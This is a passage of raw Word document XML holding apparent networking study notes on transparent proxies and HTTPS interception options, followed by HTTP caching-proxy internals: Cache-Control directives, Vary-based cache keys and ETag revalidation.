        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy registers with the router via WCCP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4BAB86" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Router intercepts HTTP traffic and GRE-encapsulates it to the proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48002412" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy decapsulates, processes, responds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4874B210" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="633"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If the proxy goes down, the router detects (missed heartbeat) and stops redirecting → traffic flows normally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDFDC64" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Transparent HTTPS Interception — The Challenges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A16B43C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The fundamental problem:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> If the client connects to https://example.com, it performs a TLS handshake expecting example.com's certificate. The transparent proxy can't present this certificate (it doesn't have the private key).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240D1559" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Options:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F8CFF9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SNI-based routing only:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Proxy reads the SNI (Server Name Indication) in the TLS Client Hello (sent in plaintext before encryption). Routes based on domain name. Cannot inspect content.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784F58B9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS interception (MITM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170BA62C" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy dynamically generates a certificate for example.com signed by its own CA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F2AE4B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Client must trust this CA (installed on client machines — common in corporate environments).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D153196" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Proxy terminates the client's TLS, inspects/modifies content, opens new TLS to the real server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C2621" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Controversial:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Breaks the security model of TLS. Required for corporate DLP/compliance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEF8345" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bump and splice:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228BF29E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Inspect only the certificate and SNI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE7574F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If the destination is "safe," splice the connection (pass bytes through without inspection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0D6F94" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="634"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If suspicious, fully intercept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217E609A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Use Cases for Transparent Proxies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084CB3A3" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ISP-level caching:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> ISPs transparently cache popular content (YouTube, Netflix) to reduce backbone traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019436D5" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Corporate security:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Monitor/filter employee internet access without requiring explicit proxy configuration on every device.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0828DA" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Captive portals:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Hotel/airport WiFi intercepts HTTP traffic and redirects to a login page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A13F1C4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Government censorship:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Transparently block access to specific websites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E9E85" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CDN integration:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Transparent caching at the network edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298419E4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:pict w14:anchorId="566F10E8">
          <v:rect id="_x0000_i3320" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE1F939" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Caching Proxy — Deep Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3722DECB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.1 How a Caching Proxy Decides What to Cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC9D87A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The HTTP caching model (defined by RFC 7234):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D82AC25" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>The ORIGIN SERVER controls cacheability via headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6912C987" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache-Control directives: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766"/>
        <w:gridCol w:w="6584"/>
      </w:tblGrid>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="1C6491B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CA21D4" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Directive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807711" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003D61F4">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="476B975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378282" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">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968B52" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Any cache (proxy, CDN) may store this response</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="7704E22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98BFB1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>private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FEA4CB" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Only the end-user's browser may cache (not shared proxies)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="49E062A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63D26D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>no-cache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8C492F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Cache MAY store, but MUST revalidate with origin before serving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="1E41B98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353439" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>no-store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215835" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>MUST NOT store the response at all (sensitive data)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="1480B11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7651F1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>max-age=3600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3280B7" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Response is fresh for 3600 seconds from generation time</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="7FDA81D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178E10" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>s-maxage=600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B1BE33" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Specifically for shared caches (proxies); overrides max-age</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="1E329A9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B32037" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>must-revalidate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E7D064" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>Once stale, MUST revalidate (no serving stale under any circumstances)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="795D8A4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6276D8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>stale-while-revalidate=60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75EEF8" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>May serve stale for 60s while asynchronously revalidating in background</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D61F4" w:rsidRPr="003D61F4" w14:paraId="3F3CA17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8E3B4E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>stale-if-error=300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85E8B1" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
            <w:r w:rsidRPr="003D61F4">
              <w:t>May serve stale for 300s if origin returns error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="140B6A43" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 The Cache Lookup Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F854E0" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache key construction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DCC243" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Default: method + URL + Vary headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5115303F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E8CBA9" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>GET https://example.com/api/users + Accept-Encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D9E603" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>→ Cache key: "GET|https://example.com/api/users|Accept-Encoding:gzip"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F59F633" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The Vary header:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3946FF0F" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>Server responds: Vary: Accept-Encoding, Accept-Language</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B3B817" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>This means: the response VARIES based on these request headers. The cache must store separate copies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA3BCC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>One for Accept-Encoding: gzip + Accept-Language: en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC4DB40" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>One for Accept-Encoding: br + Accept-Language: fr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741BED6E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="636"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Different combinations are different cache entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E70843A" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why Vary matters for correctness:</w:t>
      </w:r>
      <w:r w:rsidRPr="003D61F4">
        <w:t> Without it, the proxy might serve a gzip-compressed response to a client that doesn't support gzip.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8D9B3B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Cache Revalidation — Conditional Requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C891181" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:t>When a cached response becomes stale (max-age expired):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6171716E" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ETag-based revalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581974A2" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Original response included: ETag: "abc123" (a hash of the content).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639C455D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cache sends to origin: GET /page HTTP/1.1; If-None-Match: "abc123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1DEACE" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Origin checks: if current content still hashes to "abc123":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC5E1DC" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Responds: 304 Not Modified (empty body).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6576AD08" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cache serves the stored response (still valid). Saved bandwidth.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D8EC58" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="637"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>If content changed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60EF96AD" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Responds: 200 OK with new body + new ETag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62745937" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="637"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003D61F4">
        <w:t>Cache stores the new response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248F822D" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4" w:rsidP="003D61F4">
      <w:r w:rsidRPr="003D61F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Last-Modified-based revalidation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3081C11B" w14:textId="77777777" w:rsidR="003D61F4" w:rsidRPr="003D61F4" w:rsidRDefault="003D61F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="638"/>
        </w:numPr>
      </w:pPr>
